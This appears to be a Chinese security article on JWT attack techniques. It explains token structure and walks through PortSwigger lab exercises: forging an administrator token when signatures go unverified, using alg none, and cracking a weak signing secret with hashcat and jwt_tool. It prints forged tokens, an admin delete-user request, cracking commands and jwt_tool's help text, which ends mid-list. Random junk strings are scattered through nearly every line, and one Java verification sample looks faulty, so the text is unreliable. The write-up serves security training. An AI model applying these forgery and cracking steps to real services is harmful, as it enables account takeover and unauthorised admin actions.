干货 | JWT渗透姿势一篇通. f% [# N" ] |, a A+ W+ x
渗透安全团队 2023-10-20 00:00 湖北- w( w+ z3 B: _
1 \! R! b7 e% D 文章前言
由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
5 W, l W$ ^; I6 M
' {$ ~. I# N6 s 企业内部产品应用使用JWT作为用户的身份认证方式,在对应用评估时发现了新的关于JWT的会话安全带来的安全问题,后期再整理时又加入了之前遗留的部分JWT安全问题,至此汇总成一篇完整的JWT文章 g/ Q( h: |+ I0 n: y
* j* I' g. }& r3 D' z/ R4 T5 A" k ]5 U4 H' f, c( M* D 简单介绍; ]+ _/ `* }4 \+ F$ n. ^
) }. L. k9 V) h/ a* Y1 m& HJWT(JSON Web Token)是一种用于身份认证和授权的开放标准,它通过在网络应用间传递被加密的JSON数据来安全地传输信息使得身份验证和授权变得更加简单和安全,JWT对于渗透测试人员而言可能是一种非常吸引人的攻击途径,因为它们不仅是让你获得无限访问权限的关键而且还被视为隐藏了通往以下特权的途径,例如:特权升级、信息泄露、SQLi、XSS、SSRF、RCE、LFI等# I# q) ^5 p2 Y) \4 o$ _$ ~
; d/ S q/ E2 V( h# B 基础概念
基本结构
# N9 R) h7 u3 r! G* I6 } JWT(JSON Web Token)的结构由三部分组成,分别是Header、Payload和Signature,下面是每一部分的详细介绍和示例:: k+ k/ ^5 j8 ?: g( T
2 C0 q$ q5 [7 L5 }: V) @3 m; M1 i Header. j j# P$ B7 ^8 _; z v: `' ]
Header包含了JWT使用的算法和类型等元数据信息,通常使用JSON对象表示并使用Base64编码,Header中包含两个字段:alg和typ
alg(algorithm):指定了使用的加密算法,常见的有HMAC、RSA和ECDSA等算法
typ(type):指定了JWT的类型,通常为JWT
下面是一个示例Header:
9 G) i' s9 h; U1 x- }2 U5 a6 d, @
{
"alg": "HS256",
4 z! V2 _& M1 Q: V( ]
"typ": "JWT"
0 O9 `1 I% [# t$ ?3 h
}, }( Z% r: r& q5 F3 ], c, L
其中alg指定了使用HMAC-SHA256算法进行签名,typ指定了JWT的类型为JWT
7 I x! ]2 @& P& mPayload
Payload包含了JWT的主要信息,通常使用JSON对象表示并使用Base64编码,Payload中包含三个类型的字段:注册声明、公共声明和私有声明
& M7 D# c2 v6 w! g- ~. e 下面是一个示例Payload:
/ [! f0 {- V& z! z1 [% k% s$ c+ c! a, a% ~/ C; i3 w4 R
{
2 O0 o8 h# i+ x! k* Y
"sub": "1234567890",
7 J. }" \; D5 x* x2 l& L! ]
"name": "John Doe",
1 J8 H4 Y$ P4 A# Y
"iat": 1516239022
% U. F8 K6 w$ ]! y1 C
}
其中sub表示主题,name表示名称,iat表示JWT的签发时间
3 H, p. Y2 f! F$ O1 N/ v/ Y& W Signature
+ l6 n7 _7 t$ \4 B# ^$ z2 b Signature是使用指定算法对Header和Payload进行签名生成的,用于验证JWT的完整性和真实性,Signature的生成方式通常是将Header和Payload连接起来然后使用指定算法对其进行签名,最终将签名结果与Header和Payload一起组成JWT,Signature的生成和验证需要使用相同的密钥,下面是一个示例Signature" i3 |1 j7 I, O9 X9 X+ o
8 K& m- i& l" [) G5 mHMACSHA256(base64UrlEncode(header) + "." +base64UrlEncode(payload),secret)+ a4 ?9 e( _! |8 Y
6 W/ h6 B9 }$ F3 \/ K; n其中HMACSHA256是使用HMAC SHA256算法进行签名,header和payload是经过Base64编码的Header和Payload,secret是用于签名和验证的密钥,最终将Header、Payload和Signature连接起来用句点(.)分隔就形成了一个完整的JWT,下面是一个示例JWT,其中第一部分是Header,第二部分是Payload,第三部分是Signature,注意JWT 中的每一部分都是经过Base64编码的,但并不是加密的,因此JWT中的信息是可以被解密的
. s+ R% d. T5 u% t4 K) c( r8 s* {- p% x/ S
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
在线平台
- t) z) b& M3 }! o- D; B- u
下面是一个JWT在线构造和解构的平台:
! w. r7 u; T* G) m6 ]
https://jwt.io/% q: Q# I' s; v: N+ }
A+ N3 O* Z1 w6 ]4 T3 t* f; f
8 d' T' O; A3 |/ z& Z 工作原理
+ B, |& j# Z+ c3 V1 G JWT工作原理
1 Q& l* x) t- j4 i8 HJWT的工作流程如下:
! t/ C* e2 o/ A4 O8 M JKU工作原理
Step 1:用户携带JWS(带有签名的JWT)访问应用% H6 s( R4 z9 Q- K3 U
2 g i" Q: K/ I( _7 G4 K8 k& i) z8 O+ C/ [# n# i: q: \
7 }$ d; C: s6 [; n. C) ^4 [% E, p
Step 2:应用程序解码JWS得到JKU字段 Z0 @5 d: ]3 o( I; ?+ @" l
& [& I: ]+ d* w. V- z# M( Z! u( n& E k5 N7 W# ^" b& N
6 W, z9 d7 T: E( C) [
: j# n1 {2 O+ X( z Step 3:应用根据JKU访问返回JWK的服务器
0 m8 E& t1 A% X, L6 l* p- C5 h" D" `
Step 4:应用程序得到JWK
9 f# U* P. p! _6 t* P0 E% I# E2 |$ O$ k0 p) H$ S7 P& D. @3 B
1 |! {) h: A7 P3 m0 E; Q. r
& [6 O2 u0 T9 J# E) I7 t% Y Step 5:使用JWK验证用户JWS
- d: [ {. X' m1 H1 P2 s& c; } E0 N9 `8 b3 a/ x* ]4 ^, o; N0 N) j
Step 6:验证通过则正常响应: H, m- E8 p. A- C3 m4 Z1 E, l4 ~
漏洞攻防
1 _! I% V- q1 p8 O9 T# G4 P; Z! B- g5 I$ `% w' o- L 签名未校验
3 P6 k: l8 j6 O验证过程
: D" d% J: p4 j* AJWT(JSON Web Token)的签名验证过程主要包括以下几个步骤:+ U+ X7 x( t4 ^4 K# }
8 C& [/ f2 L+ A0 q. k, i5 t下面是一个使用JAVA进行JWT签名验证的示例代码:& L9 G& F2 Q( V1 n# i" D* t5 @
: A2 I% O$ G# w) x1 R, C
import io.jsonwebtoken.Claims;
import io.jsonwebtoken.Jwts;
; v/ e* C8 x1 z6 c: G" @1 J
import io.jsonwebtoken.SignatureAlgorithm;
0 R! S( z, P/ y2 g& F
import java.util.Date;
$ f, [. [0 ^; @9 O: |) D
) B# k5 L3 ?7 z8 m
public class JWTExample {
; k3 ? b* k5 `. J" f
private static final String SECRET_KEY = "my_secret_key";
public static void main(String[] args) {
) k( k& ]+ r: B8 q
// 构建 JWT
String jwtToken = Jwts.builder()
6 g' r0 ^0 {7 \% s; O& M$ g1 E6 Y
.setSubject("1234567890")
+ [& b- ], p: {4 \" D, S
.claim("name", "John Doe")
.setIssuedAt(new Date())
' _7 V6 w J( s
.setExpiration(new Date(System.currentTimeMillis() + 3600000)) // 1 hour
/ K7 M6 O/ B% R) r, k
.signWith(SignatureAlgorithm.HS256, SECRET_KEY)
.compact();
1 W( |0 r& F; l! `: R! @9 a
// 验证 JWT
try {
4 H9 I7 e0 t9 ~4 q0 H
// 分离 Header, Payload 和 Signature
String[] jwtParts = jwtToken.split("\\.");
8 \( c+ F/ S8 W! f
String header = jwtParts[0];
String payload = jwtParts[1];
* ?2 Y/ O8 q' f
String signature = jwtParts[2];
// 验证签名
String expectedSignature = Jwts.parser()
. ?- n) t- h. A8 @! E
.setSigningKey(SECRET_KEY)
& p& F5 l( i) R2 R
.parseClaimsJws(jwtToken)
.getSignature();
$ p) Z: a( L. w; K: m- j
if (!signature.equals(expectedSignature)) {
3 |. \, S4 \9 J. x: N3 X# n
throw new RuntimeException("Invalid JWT signature");
+ A7 d' s7 J9 {! W9 l/ N
}
// 验证 Payload 中的信息
Claims claims = Jwts.parser()
.setSigningKey(SECRET_KEY)
.parseClaimsJws(jwtToken)
( m; I+ S) _) ?$ _
.getBody();
3 z5 N" {3 h, E& e t4 O
System.out.println("Valid JWT");
8 f, h9 W7 }6 B$ |* T$ A
} catch (Exception e) {
& E. ?/ P4 C1 a2 _, Z! ^
System.out.println("Invalid JWT: " + e.getMessage());
}
W2 n% {( v! g* R- H
}
}
在上面的示例代码中使用jwt库进行JWT的签名和验证,首先构建了一个JWT,然后将其分离为Header、Payload和Signature三部分,使用parseClaimsJws函数对JWT进行解析和验证,从而获取其中的Payload中的信息并进行验证,最后如果解析和验证成功,则说明JWT是有效的,否则说明JWT是无效的,在实际应用中应该将SECRET_KEY替换为应用程序的密钥
漏洞案例
* Z, |0 F5 Q) v, L, K# g% @8 N2 A O4 h5 Q. T( \4 L/ w9 f R
JWT库会通常提供一种验证令牌的方法和一种解码令牌的方法,比如:Node.js库jsonwebtoken有verify()和decode(),有时开发人员会混淆这两种方法,只将传入的令牌传递给decode()方法,这意味着应用程序根本不验证签名,而我们下面的使用则是一个基于JWT的机制来处理会话,由于实现缺陷服务器不会验证它收到的任何JWT的签名,如果要解答实验问题,您需要修改会话令牌以访问位于/admin的管理面板然后删除用户carlos,您可以使用以下凭据登录自己的帐户:wiener:peter
靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature
& O# g" |0 M$ A7 z8 Q$ g9 w
演示步骤:
8 H+ s: O+ k" F7 G
Step 1:点击上方的"Access the Lab"访问靶场并登录账户 x( W6 e' ]6 Y; @# a4 k) B
- e" D) u5 y, d1 `( _: P0 V7 }. f
7 z/ L) j2 Z- E, [0 Q% o& p Step 2:进入到Web界面并登录靶场账户( p8 x+ o- I7 |; E* Q9 s
l$ f/ ?# {$ b+ ^% R* B* e wiener:peter
5 L7 n5 H. e; v' r! s4 B
+ I, I2 a8 I! v" ]* ]/ b
登录之后会看到如下一个更新邮箱的界面
' F! \7 |% c+ f& u4 ~$ X& T
0 ]6 R, t3 [2 {: Z+ Y' s Step 3:此时在我们的burpsuite中我们可以看到如下的会话信息. j# S) X! ~9 n$ W
0 S& g6 o/ i$ ?% V7 ^3 S* `( G. z& k& h9 F# L
- L/ v$ E& o8 p1 R 此时查询当前用户可以看到会显示当前用户为wiener:
2 p$ P' }% l, f; N3 P. z
6 _8 ~1 _, O0 S" r0 l: a 截取上面中间一部分base64编码的部分更改上面的sub为"administrator"3 z8 A4 W0 N% z* I9 a
, I" e7 P$ I: f: h2 g8 z5 I- }' Y+ b# H' `4 n; d eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MDA4M30
' v/ F% L) o% }1 k8 B) u
构造一个sub为"administrator"的载荷并将其进行base64编码处理:
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTAwODN9/ v6 L( v* v3 p, b8 ?6 C+ p
1 i2 f2 W+ \0 f3 Q" M
& P Z* _/ F/ P5 F/ Q4 j, j V3 F
- j1 ^3 V& F* n7 A ?* s 替换之后重新发送请求: F5 E0 T: e: l. v# R% _+ {
5 Q1 n9 J2 o, c! h6 I, l0 N9 F5 ?* u; Q1 f4 u
a5 P- u6 @5 `8 B
按照题目要求访问/admin路径,发现两个删除用户的调用接口:
- X+ ]6 ]$ r, q+ b: {; m# _/ b3 {1 H- t) _9 u6 w1 e
5 d' ?7 k, O# G; c {
请求敏感链接——删除用户carlos& D" {& Y. \1 |( N0 J
GET /admin/delete?username=carlos HTTP/1.1
7 m: I& K2 h9 \, g3 r% Z4 Q
1 B* t7 v( s( g, ?7 c 完成靶场的解答:
5 P# P" M3 ?0 G: T, Z7 b/ W
& x% p3 {, r& f5 j- n
4 u. D' |- v/ a" W! a 签名用None
# N6 X, z4 p+ p9 H& e# h 场景介绍
# ^% i+ T: S( c在JWT的Header中alg的值用于告诉服务器使用哪种算法对令牌进行签名,从而告诉服务器在验证签名时需要使用哪种算法,目前可以选择HS256,即HMAC和SHA256,JWT同时也支持将算法设定为"None",如果"alg"字段设为"None",则标识不签名,这样一来任何token都是有效的,设定该功能的最初目的是为了方便调试,但是若不在生产环境中关闭该功能,攻击者可以通过将alg字段设置为"None"来伪造他们想要的任何token,接着便可以使用伪造的token冒充任意用户登陆网站4 K1 m$ v6 L b, Y
5 ^/ g; m5 A4 `+ s5 Z/ \4 h% [7 a) K0 s7 ^- b0 z6 o
{
"alg": "none",
"typ": "JWT"
}
) I$ \- ~ D7 Q' ]' T 漏洞案例
! ]' @( U1 N: ^0 f$ G& [+ O$ A& b7 y% Q: h 实验靶场:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification
, D; U$ r: o1 F
+ ^3 G1 t$ u( h- @& @* [
实验流程:
8 y2 ^. p z* ~$ u4 W3 ^; p, F
Step 1:点击上方的"Access the lab"访问靶场环境
$ P) N2 y& ?3 `; s t$ Y
https://0a9c00a8030ba77784d7b92d ... curity-academy.net/
0 ?9 \# w$ U- ~3 I) v9 C
- O9 t' T0 M% P8 r; h Step 2:使用账户密码进行登录
( J r" T9 r! p& k j wiener:peter" K2 v9 s8 G+ S
) `& ~3 @: P$ o8 k# R2 E, j
Step 3:登录之后可以看到如下界面' ^& {6 q9 j# y
2 I" K1 z f3 U' U5 L* ?: c0 C! s+ U' v. Q' H) T i: _8 ^; P 8 j @* F$ y) a+ x
Step 4:捕获到的数据报信息如下所示
( _2 U9 V. Z8 u6 u4 W' \7 [
& k& Q$ U' }, @# Y% q# h; [; u$ l 截取JWT的第二部分对其进行base64解码:
& S; Y U! ]( @" |* D eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5MzQ5M30! g: b# a2 K7 D- O/ ]
) I- m2 ~- Q# o/ U* q j- ~* C m# K4 \' l% y$ U$ }
将上述的sub字段值更改为"administrator"
eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6ImFkbWluaXN0cmF0b3IiLCJleHAiOjE2ODc3OTM0OTN9
- \( {7 V9 e) p. Q$ ?8 `3 J+ k" R; R4 }# K) O
Step 4:在使用wiener用户的凭据访问/admin是会提示401 Unauthorized
, Y: T; T, I% _% v2 N: h
Step 5:将第一步分的alg参数改为none
eyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJSUzI1NiJ97 o$ s7 ]8 Z1 Y& _
3 @" `( d+ _. u+ t% I) W/ V+ d$ P2 L9 X7 U* h3 }! z ) H0 ^( t* }: N
1 G5 U/ J; B' ]2 \5 x- ]2 }& h 更改之后的header部分:$ n. w2 n( k6 I& _: H1 p& {& f! y
eyJraWQiOiIyNmNlNGNmMi0wYjFhLTQzZTUtOWYzNy1kOTA2ZjkxZmY2MzkiLCJhbGciOiJub25lIn0=
7 n0 n% }+ e3 l9 w* ?. q3 I, D( @ . D) u: t* j: U
替换JWT Token中的第二部分为之前我们构造的信息,同时移除签名部分,再次请求数据获取到敏感数据链接3 u( }6 X1 \2 E% r* ` U
2 ^) a) Z" h }' @# Z" y6 b( W
) H! v4 l/ V' C( D. S 调用敏感链接移除用户信息,完成解题操作:
5 R8 l7 G" o# c9 Y3 x6 S2 g: O
% g5 l' _+ a& h, f
密钥暴力猜解' ~2 q! ^% o* s0 l1 i
. i2 X7 G$ L, I/ M. D6 F& f密钥介绍
* \! w5 H) {/ V7 w3 W9 o: y2 T# I! J& E+ h5 X 在JT中密钥用于生成和验证签名,因此密钥的安全性对JWT的安全性至关重要,一般来说JWT有以下两种类型的密钥:8 s. L3 N( n( T* O* J
下面是一个使用JWT和对称密钥的JAVA示例代码:
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
import java.util.Date;
1 b7 U( m8 m: j; N
public class JWTExample {
! A) o. `- P- P" J- l1 i/ D
private static final String SECRET_KEY = "mysecretkey"; // 设置密钥
r6 U! H1 G7 O/ Z/ I/ m% H, Z" W- G
; x- m$ o( Q5 m# O4 @% `- I
public static void main(String[] args) {
. W5 T" U. l. S( O# r
String token = createJWT("123456"); // 生成JWT
System.out.println(token);
) A' `; p0 }" T
String result = parseJWT(token); // 验证JWT
System.out.println(result);
}
public static String createJWT(String id) {
+ g3 Z- g% B' J! V) [4 v8 x/ j
// 设置JWT过期时间为1小时
, P; t+ B# o+ d6 p( U
long nowMillis = System.currentTimeMillis();
Date now = new Date(nowMillis);
long expMillis = nowMillis + 3600000; // 1小时
" Y& W8 [/ ?8 \1 U3 }7 N
Date exp = new Date(expMillis);
0 b4 J, [$ r1 F. j* l `! F$ O) g
// 生成JWT
- A: K u! ~# C5 f' U
String token = Jwts.builder()
' a( N" U" Z5 J8 m
.setId(id)
% s) C; h/ U- o+ Y
.setIssuer("issuer")
.setSubject("subject")
e: ?/ e8 ~! Q3 Z
.setIssuedAt(now)
8 f _7 u$ g+ ~8 {3 r( T. S
.setExpiration(exp)
.signWith(SignatureAlgorithm.HS256, SECRET_KEY)
.compact();
; p U" N+ C- L/ W0 a$ \
return token;
}
public static String parseJWT(String token) {
. ?! t0 [1 @! d- Z
// 验证JWT是否合法
3 ~; r H1 G; y# j
String result = "";
try {
result = Jwts.parser()
.setSigningKey(SECRET_KEY)
.parseClaimsJws(token)
7 j: G( Z/ G3 R* _6 `
.getBody()
% v7 N( ]5 t0 _# Q1 O$ r5 o, V
.getId();
/ J6 \- ]: m4 a
} catch (Exception e) {
$ f/ X: c- ?# z0 ~- j& C
e.printStackTrace();
}
return result;
* ~! m- g& h; j. M. O2 r
}
4 R8 t3 U& {' K0 O& ]& y
}
下面是一个使用JWT和非对称密钥的Java示例代码,代码中使用了RSA算法生成非对称密钥对:
9 Z/ A7 p$ d: y* x
import io.jsonwebtoken.Claims;
6 k7 f- }2 h" t$ H0 D" n$ t# T
import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;
import io.jsonwebtoken.security.Keys;
' S- _" k3 p" z; F2 n% L5 E$ I
import java.security.KeyPair;
% j1 j2 \: U! H7 ~
import java.security.KeyPairGenerator;
P& B/ M$ I5 g9 k, k: q2 i2 F5 R
import java.security.NoSuchAlgorithmException;
' s$ B, s& {* B8 b
import java.security.PrivateKey;
import java.security.PublicKey;
import java.util.Date;
! E) H+ f. [7 ?7 g/ k
public class JWTExample {
: w, }# s' Q8 Z G
private static final String ISSUER = "example.com";
private static final String SUBJECT = "user@example.com";
' Y# x+ }/ }# }: l4 f
public static void main(String[] args) throws Exception {
5 v, q- }9 Q" L
KeyPair keyPair = generateKeyPair();
String token = createJWT(ISSUER, SUBJECT, keyPair.getPrivate());
System.out.println(token);
$ Q% I% v& l. I6 M2 }( n
Claims claims = parseJWT(token, keyPair.getPublic());
3 S7 G4 C1 M" f- U
System.out.println(claims.getIssuer());
2 q2 n4 c! {" G4 e* W' x
System.out.println(claims.getSubject());
}
) W) P( f7 j$ e9 X
. [, H3 ^ u8 D& C; ]% I$ E
public static String createJWT(String issuer, String subject, PrivateKey privateKey) {
6 w- b7 @7 q* I6 H) q
Date now = new Date();
Date expiration = new Date(now.getTime() + 3600 * 1000); // 1 hour
, b5 n. v: D. G! {) N3 Y* t
return Jwts.builder()
.setIssuer(issuer)
- A) j& C- F, y$ n V9 x
.setSubject(subject)
.setIssuedAt(now)
.setExpiration(expiration)
& {5 D; x6 g% v6 L
.signWith(privateKey, SignatureAlgorithm.RS256)
.compact();
}
public static Claims parseJWT(String token, PublicKey publicKey) {
return Jwts.parserBuilder()
0 s, r$ F2 u5 f, A% U6 j7 X8 P
.setSigningKey(publicKey)
/ {7 l `. u1 _( [: V$ t$ g
.build()
.parseClaimsJws(token)
8 G, m* Y' ]. [7 C
.getBody();
}
public static KeyPair generateKeyPair() throws NoSuchAlgorithmException {
( c. v4 ~5 t- Y# X4 o
KeyPairGenerator generator = KeyPairGenerator.getInstance("RSA");
generator.initialize(2048);
return generator.generateKeyPair();
) ?( h$ Q+ w6 k- x) }
}
& A( f! f/ U, v5 o b" d
}) F: n: _7 `% d
在这个示例中我们使用了Java中的KeyPairGenerator类来生成一个2048位的RSA密钥对,然后使用私钥生成JWT,使用公钥验证JWT,在创建JWT时我们设置了JWT的颁发者、主题、签发时间和过期时间并使用signWith()方法和SignatureAlgorithm.RS256算法使用私钥进行签名,在验证JWT时我们使用公钥来解析JWT并获取声明的内容,在实际的研发编码中我们一方面要妥善保管密钥,另一方面需要使用较为复杂难以被猜解的密钥作为密钥首选,例如:随机字母+数字的32位长度组合7 x# Z1 i8 W: R% b+ C
漏洞案例
7 G; J& J) _0 {8 r; {8 t; M. y
在实现JWT应用程序时,开发人员有时会犯一些错误,比如:忘记更改默认密码或占位符密码,他们甚至可能复制并粘贴他们在网上找到的代码片段然后忘记更改作为示例提供的硬编码秘密,在这种情况下攻击者使用众所周知的秘密的单词列表来暴力破解服务器的秘密是很容易的,下面是一个公开已知密钥列表:
https://github.com/wallarm/jwt-s ... er/jwt.secrets.list
7 _7 D6 a! [1 i1 ^" X( @/ r. _! Y ' `3 M& o8 i) \. x
: p. x5 `2 ]1 `4 V1 a5 x$ W! J 在这里我们也建议使用hashcat来强力破解密钥,您可以手动安装hashcat,也可以在Kali Linux上使用预先安装好的hashcat,您只需要一个来自目标服务器的有效的、签名的JWT和一个众所周知的秘密的单词表然后就可以运行以下命令,将JWT和单词列表作为参数传入:
6 a" {7 m7 K L+ K4 phashcat -a 0 -m 16500 <jwt> <wordlist>8 I) ^/ d5 \- T
Hashcat会使用单词列表中的每个密钥对来自JWT的报头和有效载荷进行签名,然后将结果签名与来自服务器的原始签名进行比较,如果有任何签名匹配,hashcat将按照以下格式输出识别出的秘密以及其他各种详细信息,由于hashcat在本地机器上运行不依赖于向服务器发送请求,所以这个过程非常快,即使使用一个巨大的单词表一旦您确定了密钥,您就可以使用它为任何JWT报头和有效载荷生成有效的签名
; T; D, H% {( r# l" `* V' y8 l8 P- K& v" ^) R <jwt>:<identified-secret>
. o$ R0 J: z2 ^- K8 s% }. o6 t靶场地址:https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key
2 u; f+ \7 l+ A! u" J! A P, W" G4 v
- F' T- I- ^% T, V, X+ J3 I% l
实验步骤:
Step 1:点击上述"Access the lab"进入到靶场环境
6 ]( o, I ~/ y* r
! V% O; }# P5 ^; K6 x, R2 ] Step 2:使用以下账户进行登录操作
8 e# P/ ~: p( {& Qwiener:peter( I: k6 D1 e" k: e, j# X
4 G" M9 s% ]! A; ` . d; U$ Y. a2 w1 u) _
Step 3:捕获到如下有效的JWT凭据信息& t/ [6 P# J- O0 q+ {6 d3 z
) F" U. u6 V1 K2 g( ] eyJraWQiOiI4M2RhOGNjMi1hZmZiLTRmZGMtYWMwYS1iMWNmMTBkNjkyZGYiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY4Nzc5NjQwMn0.IhZV-7RHTpEcQvkcZOA3knCYmQD0YUg-NFMj9fWSFjw
7 T3 D( e, f r+ Z0 D- p0 d 2 x: `( r( G$ q' b& F
$ I% ` j. N* H. g( d/ n/ l" r! x) `% ]! {2 A
% V' W6 j6 G6 B t2 F q Step 5:使用字典进行暴力猜解操作
- E- W4 a0 f* b4 v
方式一:HashCat
项目地址:https://github.com/hashcat/hashcat
5 Q# J, k. m- h
项目使用:! W2 ]) K6 R+ C* H
% H* D/ ~& J% n. H' c' o
#命令格式:
7 l/ I- q7 @ P0 ^8 A
hashcat -a 0 -m 16500 <jwt> <wordlist>
4 H9 d4 j" d; v; P1 t2 c3 R' y0 h$ d: R
#执行示例:
7 d* i& a Z% f5 S
hashcat -m 16500 jwt.txt -a 0 secrets.txt --force
V0 t, @- y5 [0 w, D/ b" h+ g I# Y! x/ }7 V3 Q
方式二:jwt_tool
项目地址:https://github.com/ticarpi/jwt_tool
项目介绍:此项目主要用于JWT安全脆弱性评估,目前支持如下几种安全评估测试* r9 C- E) ]/ t( |! H/ j
+ _( a( K/ E. Q2 _0 a
& Y9 f" C+ m T) v5 m" M9 E- m4 B$ @% L! K8 ?1 `5 G Step 1:克隆项目到本地
$ _1 z! y' r3 d- S1 G* u" F( i" Q6 v+ @ https://github.com/ticarpi/jwt_tool9 P' \& D2 D" y& b! J0 x% [% f1 J
& G1 K% t+ z) b4 h3 _
4 b- {. k- @! f* O o Step 2:安装依赖库
* M$ z% q# L6 V% j7 S pip3 install pycryptodomex2 }9 i- \. Y; |/ {2 B
9 K; k: A' J7 ^' u0 K Step 3:运行jwt_tool并查看用法信息
+ k6 ]' b$ ?' p( ]+ w9 D' S( g# v: q# w5 \3 ^5 B; M3 C python3 jwt_tool.py -h
z, Z1 C$ M" Y& f* u) X- n8 g5 g" J( C* j, a$ v 2 L& E, I5 E0 O. G" u
, ]3 I9 m* C6 g, p* }. T/ q9 [! G- k; W7 G) m! `
usage: jwt_tool.py [-h] [-b] [-t TARGETURL] [-rc COOKIES] [-rh HEADERS] [-pd POSTDATA] [-cv CANARYVALUE] [-np] [-nr] [-M MODE] [-X EXPLOIT] [-ju JWKSURL] [-S SIGN] [-pr PRIVKEY] [-T] [-I] [-hc HEADERCLAIM] [-pc PAYLOADCLAIM] [-hv HEADERVALUE]
6 @: i9 ]2 T! A% j
[-pv PAYLOADVALUE] [-C] [-d DICT] [-p PASSWORD] [-kf KEYFILE] [-V] [-pk PUBKEY] [-jw JWKSFILE] [-Q QUERY] [-v]
[jwt]
9 I2 G9 y/ g4 [ e8 ]' t: Y
positional arguments:
jwt the JWT to tinker with (no need to specify if in header/cookies)
. D$ e% ~. G2 `. K# k; O
$ e, J7 V6 k F6 B; s5 a1 c2 J
options:
, e, A& F/ V4 m( L
-h, --help show this help message and exit
8 o# {# k; U& h1 L6 p9 w1 B3 X
-b, --bare return TOKENS ONLY
$ \$ V% K1 ^7 `" |+ a
-t TARGETURL, --targeturl TARGETURL
. ?7 F+ S* k+ V# H& i9 U0 u( ?7 a
URL to send HTTP request to with new JWT
-rc COOKIES, --cookies COOKIES
8 V8 U9 X: @7 ?
request cookies to send with the forged HTTP request
-rh HEADERS, --headers HEADERS
4 y" y: c3 m" W3 R3 Q. G* c
request headers to send with the forged HTTP request (can be used multiple times for additional headers)
" e [2 v4 R- l/ T# H% @
-pd POSTDATA, --postdata POSTDATA
8 Z0 V* }' w9 p4 ]
text string that contains all the data to be sent in a POST request
4 ?# F5 Z% \8 g6 @$ ~
-cv CANARYVALUE, --canaryvalue CANARYVALUE
text string that appears in response for valid token (e.g. "Welcome, ticarpi")
-np, --noproxy disable proxy for current request (change in jwtconf.ini if permanent)
6 C4 m. H; p8 ]) G4 R" B( s9 j
-nr, --noredir disable redirects for current request (change in jwtconf.ini if permanent)
-M MODE, --mode MODE Scanning mode:
pb = playbook audit
# }5 F3 Z7 d( G* E
er = fuzz existing claims to force errors
cc = fuzz common claims
- v {" h1 J' e% Z+ B" G1 [
at - All Tests!
. t% [2 b/ H }! X( s
-X EXPLOIT, --exploit EXPLOIT
" r% o4 M6 d; U# _
eXploit known vulnerabilities:
; J2 [" ?* w. C# S4 I0 s$ G( B
a = alg:none
n = null signature
b = blank password accepted in signature
v' _' H( C3 e; y& U3 t& I
s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)
2 B2 E; a5 @& L) n0 ?& l5 r! ^
k = key confusion (specify public key with -pk)
i = inject inline JWKS
, G1 n/ j/ G- C1 @& n8 n1 t
-ju JWKSURL, --jwksurl JWKSURL
URL location where you can host a spoofed JWKS
* p% }0 N3 ?" O1 ?; J$ A# r* A3 q
-S SIGN, --sign SIGN sign the resulting token:
) @0 R" f' x3 e' S* I- ]0 g
hs256/hs384/hs512 = HMAC-SHA signing (specify a secret with -k/-p)
! j7 e$ K' y) { l) @8 v* U
rs256/rs384/hs512 = RSA signing (specify an RSA private key with -pr)
es256/es384/es512 = Elliptic Curve signing (specify an EC private key with -pr)
2 q$ e4 q) o6 n8 H$ y
ps256/ps384/ps512 = PSS-RSA signing (specify an RSA private key with -pr)
-pr PRIVKEY, --privkey PRIVKEY
7 h0 D @: [! Z% _" d7 F& W E! N
Private Key for Asymmetric crypto
{ T9 z% u& ]9 x8 a; X8 E/ o
-T, --tamper tamper with the JWT contents
* d6 o. p7 X" v, m
(set signing options with -S or use exploits with -X)
-I, --injectclaims inject new claims and update existing claims with new values
(set signing options with -S or use exploits with -X)
(set target claim with -hc/-pc and injection values/lists with -hv/-pv
/ _/ ?0 R9 f, }1 m. X
-hc HEADERCLAIM, --headerclaim HEADERCLAIM
Header claim to tamper with
/ o5 J& G9 q; F. M$ p# B
-pc PAYLOADCLAIM, --payloadclaim PAYLOADCLAIM
Payload claim to tamper with
3 ?, W, H3 s5 P/ ^
-hv HEADERVALUE, --headervalue HEADERVALUE
Value (or file containing values) to inject into tampered header claim
-pv PAYLOADVALUE, --payloadvalue PAYLOADVALUE
8 X I, o# o$ H. h% T
Value (or file containing values) to inject into tampered payload claim
) i- j) U2 i% @1 f( @- }* ?) @
-C, --crack crack key for an HMAC-SHA token
: Q5 R4 |( o% u8 O& D5 k$ t* x- A
(specify -d/-p/-kf)
-d DICT, --dict DICT dictionary file for cracking
# p [- P' }) [% F" g% A
-p PASSWORD, --password PASSWORD
1 _+ G6 C) v r1 E* {/ x" C) |
password for cracking
-kf KEYFILE, --keyfile KEYFILE
3 _+ j* D$ g: _. U
keyfile for cracking (when signed with 'kid' attacks)
-V, --verify verify the RSA signature against a Public Key
% T$ C' v1 ~/ V
(specify -pk/-jw)
8 S' |, p! ~$ \ d" e0 V3 s
-pk PUBKEY, --pubkey PUBKEY
2 F1 q$ A6 R$ S+ Y" T$ c8 {! x
Public Key for Asymmetric crypto
-jw JWKSFILE, --jwksfile JWKSFILE
JSON Web Key Store for Asymmetric crypto
-Q QUERY, --query QUERY
# q# L( H0 K% z. w
